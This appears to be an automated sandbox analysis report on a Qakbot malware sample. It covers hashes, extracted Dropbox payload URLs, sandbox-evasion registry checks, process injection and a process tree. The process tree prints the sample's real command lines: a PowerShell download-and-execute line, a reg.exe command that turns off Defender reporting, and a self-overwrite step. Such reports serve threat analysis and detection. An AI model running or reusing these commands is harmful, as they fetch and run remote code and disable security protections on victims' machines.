Analysis
-
max time kernel
20s
-
max time network
73s
-
platform
windows10-2004_x64
-
resource
win10v2004-20220414-en
-
submitted
14-07-2022 03:44
Static task
static1
Behavioral task
behavioral1
Sample
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Resource
win10v2004-20220414-en
General
-
Target
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
-
Size
616KB
-
MD5
adab2a637738b6780e74b74dcabbb96f
-
SHA1
0614b295d8f8486ea42c89be35b3e44926a943c0
-
SHA256
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
-
SHA512
72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d
Malware Config
Extracted
https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1
https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1
Extracted
qakbot
322.368
1532427880
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exe
flow | pid | process
18 | 4584 | powershell.exe
-
Executes dropped EXE 2 IoCs
Processes:
gwwusfxz.exe, gwwusfxz.exe
pid | process
4124 | gwwusfxz.exe
4748 | gwwusfxz.exe
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe, gwwusfxz.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc | gwwusfxz.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service | gwwusfxz.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | gwwusfxz.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | gwwusfxz.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc | gwwusfxz.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service | gwwusfxz.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe, 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe, gwwusfxz.exe, powershell.exe, gwwusfxz.exe, explorer.exe, sihost.exe, svchost.exe, taskhostw.exe, Explorer.EXE, svchost.exe
pid | process
912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
1612 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
1612 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
1612 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
1612 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
4124 | gwwusfxz.exe
4124 | gwwusfxz.exe
4584 | powershell.exe
4584 | powershell.exe
4748 | gwwusfxz.exe
4748 | gwwusfxz.exe
4748 | gwwusfxz.exe
4748 | gwwusfxz.exe
5056 | explorer.exe
5056 | explorer.exe
5056 | explorer.exe
5056 | explorer.exe
2272 | sihost.exe
2272 | sihost.exe
2288 | svchost.exe
2288 | svchost.exe
2444 | taskhostw.exe
2444 | taskhostw.exe
2092 | Explorer.EXE
2092 | Explorer.EXE
3084 | svchost.exe
3084 | svchost.exe
-
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
gwwusfxz.exe
pid | process
4124 | gwwusfxz.exe
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exe
description | pid | process
Token: SeDebugPrivilege | 4584 | powershell.exe
-
Suspicious use of WriteProcessMemory 41 IoCs
Processes:
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe, gwwusfxz.exe, explorer.exe, cmd.exe
description | pid | process | target process
PID 912 wrote to memory of 1612 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
PID 912 wrote to memory of 1612 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
PID 912 wrote to memory of 1612 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe
PID 912 wrote to memory of 4124 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | gwwusfxz.exe
PID 912 wrote to memory of 4124 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | gwwusfxz.exe
PID 912 wrote to memory of 4124 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | gwwusfxz.exe
PID 912 wrote to memory of 2132 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | reg.exe
PID 912 wrote to memory of 2132 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | reg.exe
PID 912 wrote to memory of 4584 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | powershell.exe
PID 912 wrote to memory of 4584 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | powershell.exe
PID 4124 wrote to memory of 4748 | 4124 | gwwusfxz.exe | gwwusfxz.exe
PID 4124 wrote to memory of 4748 | 4124 | gwwusfxz.exe | gwwusfxz.exe
PID 4124 wrote to memory of 4748 | 4124 | gwwusfxz.exe | gwwusfxz.exe
PID 4124 wrote to memory of 5056 | 4124 | gwwusfxz.exe | explorer.exe
PID 4124 wrote to memory of 5056 | 4124 | gwwusfxz.exe | explorer.exe
PID 4124 wrote to memory of 5056 | 4124 | gwwusfxz.exe | explorer.exe
PID 4124 wrote to memory of 5056 | 4124 | gwwusfxz.exe | explorer.exe
PID 912 wrote to memory of 5044 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | cmd.exe
PID 912 wrote to memory of 5044 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | cmd.exe
PID 912 wrote to memory of 5044 | 912 | 4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe | cmd.exe
PID 5056 wrote to memory of 2272 | 5056 | explorer.exe | sihost.exe
PID 5056 wrote to memory of 2272 | 5056 | explorer.exe | sihost.exe
PID 5056 wrote to memory of 2272 | 5056 | explorer.exe | sihost.exe
PID 5044 wrote to memory of 4640 | 5044 | cmd.exe | PING.EXE
PID 5044 wrote to memory of 4640 | 5044 | cmd.exe | PING.EXE
PID 5044 wrote to memory of 4640 | 5044 | cmd.exe | PING.EXE
PID 5056 wrote to memory of 2288 | 5056 | explorer.exe | svchost.exe
PID 5056 wrote to memory of 2288 | 5056 | explorer.exe | svchost.exe
PID 5056 wrote to memory of 2288 | 5056 | explorer.exe | svchost.exe
PID 5056 wrote to memory of 2444 | 5056 | explorer.exe | taskhostw.exe
PID 5056 wrote to memory of 2444 | 5056 | explorer.exe | taskhostw.exe
PID 5056 wrote to memory of 2444 | 5056 | explorer.exe | taskhostw.exe
PID 5056 wrote to memory of 2092 | 5056 | explorer.exe | Explorer.EXE
PID 5056 wrote to memory of 2092 | 5056 | explorer.exe | Explorer.EXE
PID 5056 wrote to memory of 2092 | 5056 | explorer.exe | Explorer.EXE
PID 5056 wrote to memory of 3084 | 5056 | explorer.exe | svchost.exe
PID 5056 wrote to memory of 3084 | 5056 | explorer.exe | svchost.exe
PID 5056 wrote to memory of 3084 | 5056 | explorer.exe | svchost.exe
PID 5056 wrote to memory of 3292 | 5056 | explorer.exe | DllHost.exe
PID 5056 wrote to memory of 3292 | 5056 | explorer.exe | DllHost.exe
PID 5056 wrote to memory of 3292 | 5056 | explorer.exe | DllHost.exe
Processes
-
C:\Windows\system32\sihost.exe sihost.exe 1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\DllHost.exe C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} 1⤵
-
C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc 1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Explorer.EXE C:\Windows\Explorer.EXE 1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe" 2⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe" /C 3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe 3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe "C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe" /C 4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe 4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0" 3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\jaqhvnzhwhynhbmqqjwszaxuxcza.txt'" 3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4.exe" 3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE ping.exe -n 6 127.0.0.1 4⤵
- Runs ping.exe
-
C:\Windows\system32\taskhostw.exe taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} 1⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc 1⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfx.dat
Filesize
92B
MD5
afa2afe332d1e22d1f5d85be495d1693
SHA1
357d0f4d9c86fedd608edf1e172d974d8a9a7438
SHA256
79e02368bccfabdbee810fc90f7266baaf8031b31d21c80a4fab6f58fd85c2f2
SHA512
88c8e9e7900e0af1cc7e0bf8950400465929eb241292c596028a35e3bf78894ee890353581251f75d02d02f40154e0fecb834acb2acb34cb5cbdc32bf4beefef
-
C:\Users\Admin\AppData\Roaming\Microsoft\Gwwusfxzw\gwwusfxz.exe
Filesize
616KB
MD5
adab2a637738b6780e74b74dcabbb96f
SHA1
0614b295d8f8486ea42c89be35b3e44926a943c0
SHA256
4845e632325c892c3da2de6fca61624f914f0f340643174bdd34b89b38cd7fa4
SHA512
72d5f1034bc442533403b836b5c47bbe2c895f2d32eadc1cbc3982b446eb011d871cc38b17ea471e8fe09a4c30f951f411004779fbc5f7fe87a663474be49b9d